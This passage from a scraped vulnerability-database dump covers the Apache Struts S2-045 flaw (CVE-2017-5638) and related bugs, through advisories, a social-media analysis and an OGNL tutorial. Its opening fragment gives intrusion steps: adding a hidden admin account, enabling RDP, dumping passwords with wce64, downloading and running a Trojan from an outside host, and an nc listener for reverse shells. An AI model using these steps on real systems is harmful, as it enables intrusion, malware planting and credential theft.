pocwin1.py and pocwin2.py respectively, as shown in Figure 3. \nFigure 3 Modifying the exploit code for Windows\n1.3.3 Fast penetration under Windows\n1. 
Open 3389 on the target \n(1) Scan whether the target has 3389 open; if it is open, execute respectively: \npocwin1.py http://www.myhack58.com/index.action \npocwin2.py http://www.myhack58.com/index.action \nIf the target is vulnerable, this directly adds a user “antian365$” with password “Wsantian365!*”; if the server has 3389 open, log in, then download wce64 and run wce64 –w directly to obtain the current login passwords; be sure to execute it with administrator rights. \n(2) Open 3389 directly \nModify the parameter three times and execute the following code three times to open 3389. \nwmic /namespace:\\\\\\root\\cimv2\\terminalservices pathwin32_terminalservicesetting where (__CLASS != \"\") callsetallowtsconnections 1 \nwmic/namespace:\\\\\\root\\cimv2\\terminalservices path win32_tsgeneralsetting where(TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 \nreg add\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f \nOpening 3389 only works if the target has an independent IP; if it is an internal network IP, use the second method. \n2. The Trojan execution method\n(1) Download the Trojan\nFirst a Trojan program needs to be prepared, and it needs to get through on win2008. Then modify the whoami parameter in win.py: \nGermany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\\windows\\temp\\ma.exe \nSave ma.exe in the root directory of the www.myhack58.com website; it will be downloaded directly to the target's c:\\windows\\temp directory. \n(2) Execute the Trojan: modify the whoami parameter in the PoC to the real path and address of ma.exe, as follows, save the PoC and run it as before. \nc:\\windows\\temp\\ma.exe \n1.3.4 Ideas for fast penetration under Linux\n1. 
On an independent server, start listening: on the server with the independent IP, execute “nc –vv –l –p 4433”; you can then test connecting to port 4433 of this IP, for example http://www.myhack58.com:4433. If the listening port receives data, it is working normally; otherwise check the firewall rules. \n2. Run the PoC \n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-08T00:00:00", "type": "myhack58", "title": "How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-08T00:00:00", "id": "MYHACK58:62201784086", "href": "http://www.myhack58.com/Article/html/3/62/2017/84086.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-16T03:17:43", "description": "Author: janes (Knownsec 404 Team)\n\nDate: 2017-03-15\n\n## Background description\n\nAt 10pm GMT on March 6, 2017, Struts2 officially published 
a remote code execution vulnerability in Struts2, numbered S2-045, CVE number CVE-2017-5638, rated as high-risk. The vulnerability affects a wide range of versions (Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10), its degree of harm is severe (it directly yields control of the server hosting the application system), and on the morning of March 7 the PoC and Exp for the vulnerability leaked onto the Internet, so the impact of S2-045 on the Internet expanded rapidly and it received great attention from Internet companies and the government. More than a week has now passed since the vulnerability announcement (3.6-3.15), so this is an opportunity to analyze the heat distribution of S2-045 on the social media platforms Twitter and Sina Weibo.\n\n## Data acquisition\n\nTo analyze the heat distribution of the S2-045 vulnerability on Twitter and Sina Weibo, we need to obtain the data from Twitter and Sina Weibo and let the data speak. So we used “selenium+phantomjs” to crawl the data through the web search interfaces of Twitter and Sina Weibo, searching for the keywords “s2-045” and “CVE-2017-5638” respectively, then deduplicated and organized the search results. Because Twitter and Sina Weibo display times in inconsistent time zones, the time zone issue was unified by crawling the page timestamps and converting them to local time. The data was crawled up to 18:00 on March 14, 2017; the results are shown below.\n\n* Twitter\n\n* Sina Weibo\n\n## Heat analysis\n\nCounting the daily number of occurrences of the S2-045 vulnerability on Twitter and Sina Weibo gives the following table: it appears a total of 73 times on Twitter and 45 times on Sina Weibo. 
In terms of the amount of data disseminated, the volume for the S2-045 vulnerability is not large, which indirectly reflects that security vulnerability information is not followed by the general public and spreads mainly within the security circle.\n\n| Social media | March 7 | March 8 | March 9 | March 10 | March 11 | March 12 | March 13 | March 14 |\n|---|---|---|---|---|---|---|---|---|\n| Twitter | 16 | 3 | 7 | 15 | 6 | 11 | 15 | 0 |\n| Sina Weibo | 23 | 8 | 7 | 3 | 0 | 0 | 1 | 3 |\n\nUsing the data in the table above, a chart of the heat distribution was produced, from which it can be seen that:\n\n* After the S2-045 vulnerability was announced on March 6, an explosive spread occurred on Twitter and Sina Weibo on March 7, which is probably related to the wide spread of the vulnerability's PoC and Exp on the Internet on March 7;\n* On Sina Weibo the heat distribution of the S2-045 vulnerability shows an overall downward trend, peaking on March 7, while on Twitter the trend is undulating, with peaks on March 7, March 10 and March 13;\n* The overall trends on Sina Weibo and Twitter differ, and although March 7 was the highest data peak for both Sina Weibo and Twitter, the data volume on Sina Weibo exceeded that on Twitter.\n\nSeveral reasons could explain this phenomenon:\n\n* The S2-045 vulnerability was discovered by Chinese researchers; the vulnerability was officially published on the evening of March 6, and on the morning of March 7 its PoC and Exp leaked on the domestic Internet and attracted the attention of domestic security companies across the board, which also explains why the Sina Weibo data volume exceeded Twitter's on March 7;\n* Because the S2-045 vulnerability is severely harmful and the PoC and Exp spread quickly, on March 7 domestic security companies quickly started emergency response, and other Internet companies also self-checked and patched the S2-045 vulnerability; as the vulnerability was repaired, attention on Sina Weibo naturally decreased, showing an overall downward trend;\n* Twitter users are distributed across a wide range of countries and regions, which are affected by S2-045 to different degrees, so the trend shows ups and downs.\n\nMarch 7 was the data peak for both Sina Weibo and Twitter, so the distribution of the March 7 data by time period is plotted below. It can be seen that before 8 am the amount of data on Sina Weibo and Twitter was 0; data began to appear between 8 and 10 am, which matches working hours, and the data peak occurred mainly between 14:00 and 18:00, perhaps because the PoC and Exp had spread widely on the Internet and mass attacks on the Internet had begun (see [HackerNews: 24 hours after the Struts2 vulnerability disclosure](<http://hackernews.cc/archives/7371>)).\n\nFinally, let us look at when and by whom the first messages about the S2-045 vulnerability were posted on Twitter and Sina Weibo; the results are shown in the following table. 
The first messages on Twitter and Sina Weibo were not posted by the same person, but the difference in posting time is small, which shows that the ability to perceive vulnerabilities at home and abroad is roughly equal.\n\nAs above, the times are Beijing time, converted from the unix timestamps.\n\n| Social media | Time | Nickname | Real identity |\n|---|---|---|---|\n| Twitter | 2017-03-07 09:29:00 | @amannk | |\n| Sina Weibo | 2017-03-07 09:44:29 | gnaw0725 | NSFOCUS Brand Manager Wang Yang |\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "myhack58", "title": "The Struts S2-045 vulnerability heat analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "MYHACK58:62201784379", "href": "http://www.myhack58.com/Article/html/3/62/2017/84379.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-30T00:37:24", "description": "Through this article, we mainly learn how OGNL injection is achieved in Apache Struts. Our examples will be built around two critical Struts vulnerabilities: CVE-2017-5638 (the Equifax breach) and CVE-2018-11776. \nApache Struts is a free, open source framework for creating modern Java web applications. Apache Struts has had many serious vulnerabilities; one of its features is support for OGNL (Object-Graph Navigation Language), which is also the main cause of many of those vulnerabilities. \nOne of them, CVE-2017-5638, directly led to the 2017 Equifax breach, exposing the personal information of more than 145 million US citizens. Although the company's annual revenue exceeds 3 billion dollars, it still did not escape an attack on a known vulnerability in the Apache Struts MVC framework. \nThis article first introduces Apache Struts, then guides us through modifying a simple application and exploiting it using OGNL. Next, we will study in depth a number of public exploits for the platform and try them against the OGNL injection vulnerability. \nAlthough Java developers are familiar with Apache Struts, the security community often is not, which is why we wrote this article. \nGetting started \nRunning a vulnerable Struts application requires installing the Apache Tomcat web server. The latest version can be downloaded here as a ZIP. Extract the binaries to a location of your choice (we use /var/tomcat) and continue: \ncd /var/tomcat/bin # go to the unzipped folder \nchmod +x *.sh # make the scripts executable \n./startup.sh # run the startup script \nVisit http://localhost:8080/ and check whether the site is running. \nOnce confirmed, we are ready to download the old version of the Apache Struts framework that is vulnerable to the attack we are about to demonstrate. 
The Struts 2.3.30 release available from the Struts download page meets our needs. \nAfter extracting the archive, the file struts2-showcase.war is found under the apps directory. This is a demo application built with Struts, already compiled and ready to deploy. Copy the WAR file to /var/tomcat/webapps and open http://localhost:8080/struts2-showcase/showcase.action to confirm that it works. \nWeb server basics \nIf you already have a good grasp of basic Java web application concepts such as Servlets, you are ahead of the game. If you know nothing about Java Servlets, think of a Servlet simply as a component whose purpose is to serve a web application inside the web container hosted on the web server; here it is what handles requests for /struts2-showcase and other Java applications. \nTo process Servlets, a web server such as Apache Tomcat needs a few components: \n1\\. Apache Coyote is the connector that supports the HTTP/1.1 protocol. It lets the Servlet container component, Apache Catalina, communicate over HTTP. \n2\\. Apache Catalina is the container that decides, when Tomcat receives an HTTP request, which Servlet must be called. It also converts the HTTP request and response from text into Java objects that the Servlet can use. \n![](/Article/UploadPic/2019-3/201933032655612.png) \nAll the details can be found in the latest version of the Java Servlet specification, 4.0. \nApache Struts basics \nA Java web application built with the Apache Struts framework can have multiple Servlets. 
This article does not aim to teach the whole framework for building web applications, only to give a working grasp of its basic concepts; step-by-step tutorials on the subject are available elsewhere. \nThe Apache Struts framework relies on the MVC (Model-View-Controller) architectural pattern, which is very helpful because it separates the main application components: \n1\\. Model: represents the application data, for example a class such as \u201corders\u201d. \n2\\. View: the output of the application, its visual part. \n3\\. Controller: receives user input and uses the model to generate the view. \n4\\. Actions: the model in Apache Struts. \n5\\. Interceptors: part of the controller; hooks that can be invoked before or after a request is processed. \n6\\. Value stack/OGNL: a set of objects, for example model or action objects. \n7\\. Result/result type: selects the view for the business logic. \n8\\. View technologies: handle the display of data. \nThe general architecture of an Apache Struts web application is shown below: \n![](/Article/UploadPic/2019-3/201933032655347.jpg) \nThe controller receives the HTTP request and the FilterDispatcher invokes the right action for it. The action is executed, the view component prepares the result, and the result is sent back to the user in the HTTP response. \nStruts application example \nWriting a Struts application from scratch takes some time, so we use the rest-showcase demo application that ships with Struts: a basic front end over a simple REST API. To compile it, go into its directory and build it with Maven: \ncd struts-2.3.30/src/apps/rest-showcase/ \nmvn package \nThe build places struts2-rest-showcase.war in the target directory. Copy it to the Tomcat webapps directory, for example /var/tomcat/webapps, to install it. 
\nThe application source tree is shown below: \n![](/Article/UploadPic/2019-3/201933032655780.png) \nThe files are as follows: \n1\\. Order.java is the model, a Java class that stores the information of one order. \npublic class Order { \nString id; \nString clientName; \nint amount; \n... \n} \n2\\. OrdersService.java is a helper class that stores all Orders in a HashMap and manages them. \npublic class OrdersService { \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-03-30T00:00:00", "type": "myhack58", "title": "Apache Struts OGNL injection vulnerability principle with an example-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2019-03-30T00:00:00", "id": "MYHACK58:62201993410", "href": "http://www.myhack58.com/Article/html/3/62/2019/93410.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "lenovo": [{"lastseen": "2018-07-13T19:27:14", "description": "**Lenovo Security Advisory**: LEN-14200\n\n**Potential Impact:** Remote code execution\n\n**Scope of Impact: **Industry-Wide\n\n**CVE Identifier: **CVE-2017-5638\n\n**Summary Description:**\n\nLenovo V3700 V2, Lenovo V3700 V2 XP, Lenovo V5030/V5030F and Storwize V7000 for Lenovo storage devices contain a vulnerability in Apache Struts 2, an open source web application framework, that could allow an attacker to perform remote code execution with a maliciously-crafted Content-Type value. \n\n**Mitigation Strategy for Customers (what you should do to protect yourself):**\n\nLenovo recommends customers update using the latest firmware update bundle by following the instructions in the links below.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-09T00:00:00", "type": "lenovo", "title": "Apache Struts Open Source Framework Remote Code Execution - us", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-09T00:00:00", "id": "LENOVO:PS500093-NOSID", "href": 
"https://support.lenovo.com/us/en/product_security/len-14200", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-11-25T19:26:40", "description": "**Lenovo Security Advisory**: LEN-14200\n\n**Potential Impact:** Remote code execution\n\n**Scope of Impact: **Industry-Wide\n\n**CVE Identifier: **CVE-2017-5638\n\n**Summary Description:**\n\nLenovo V3700 V2, Lenovo V3700 V2 XP, Lenovo V5030/V5030F and Storwize V7000 for Lenovo storage devices contain a vulnerability in Apache Struts 2, an open source web application framework, that could allow an attacker to perform remote code execution with a maliciously-crafted Content-Type value. \n\n**Mitigation Strategy for Customers (what you should do to protect yourself):**\n\nLenovo recommends customers update using the latest firmware update bundle by following the instructions in the links below.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 6.0}, "published": "2017-06-09T00:00:00", "type": "lenovo", "title": "Apache Struts Open Source Framework Remote Code Execution - Lenovo Support US", "bulletinFamily": "info", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-09T01:36:21", "id": "LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ps500093-apache-struts-open-source-framework-remote-code-execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2023-12-06T16:28:12", "description": "Added: 03/16/2017 \nCVE: [CVE-2017-5638](<https://vulners.com/cve/CVE-2017-5638>) \nBID: [96729](<http://www.securityfocus.com/bid/96729>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 improperly handles file upload. Remote attackers can execute arbitrary commands via a \"`**#cmd=**`\" string in a specially crafted Content-Type HTTP header. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) Struts 2.3.x series to Struts 2.3.32 or later, and Struts 2.5.x series to Struts 2.5.10.1 or later. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-045> \n<https://www.exploit-db.com/exploits/41570/> \n\n\n### Limitations\n\nExploit works on vulnerable versions of Apache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10. 
\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "saint", "title": "Apache Struts 2 Jakarta Multipart Parser file upload command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "SAINT:484D58D595B8F6CEE787306160971308", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_jakarta_file_upload_command_execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T16:52:04", "description": "Added: 03/16/2017 \nCVE: [CVE-2017-5638](<https://vulners.com/cve/CVE-2017-5638>) \nBID: [96729](<http://www.securityfocus.com/bid/96729>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 improperly handles file upload. 
Remote attackers can execute arbitrary commands via a \"`**#cmd=**`\" string in a specially crafted Content-Type HTTP header. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) Struts 2.3.x series to Struts 2.3.32 or later, and Struts 2.5.x series to Struts 2.5.10.1 or later. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-045> \n<https://www.exploit-db.com/exploits/41570/> \n\n\n### Limitations\n\nExploit works on vulnerable versions of Apache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "saint", "title": "Apache Struts 2 Jakarta Multipart Parser file upload command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_jakarta_file_upload_command_execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:29", "description": "Added: 03/16/2017 \nCVE: 
[CVE-2017-5638](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) \nBID: [96729](<http://www.securityfocus.com/bid/96729>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 improperly handles file upload. Remote attackers can execute arbitrary commands via a \"`**#cmd=**`\" string in a specially crafted Content-Type HTTP header. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) Struts 2.3.x series to Struts 2.3.32 or later, and Struts 2.5.x series to Struts 2.5.10.1 or later. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-045> \n<https://www.exploit-db.com/exploits/41570/> \n\n\n### Limitations\n\nExploit works on vulnerable versions of Apache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10. 
\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "saint", "title": "Apache Struts 2 Jakarta Multipart Parser file upload command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "SAINT:966010900F7632E797C552D31C2BB53A", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_jakarta_file_upload_command_execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. 
\n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:AE1DA80E6B0E4C12B5D781794166897B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T16:52:06", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an 
open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 